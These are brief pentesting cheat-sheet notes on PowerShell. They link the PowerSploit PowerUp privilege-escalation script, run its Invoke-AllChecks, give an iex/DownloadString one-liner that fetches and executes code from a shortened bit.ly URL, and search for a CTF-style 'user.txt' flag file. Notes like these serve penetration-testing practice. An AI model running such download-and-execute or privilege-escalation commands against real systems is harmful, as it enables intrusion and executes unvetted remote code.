PowerShell For Pentesters Part 1: Introduction to PowerShell and Cmdlets
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
From Powershell:
Import-Module ./PowerUp.ps1
Invoke-AllChecks
Determine outside connectivity and firewall allowance:
iex(New-Object Net.WebClient).DownloadString('[<http://bit.ly/1kEgbuH>](<http://bit.ly/1kEgbuH>)')
Search recursively for a file called "user.txt" for example:
Get-ChildItem -ErrorAction SilentlyContinue -Recurse C:\\ -Filter "user.txt"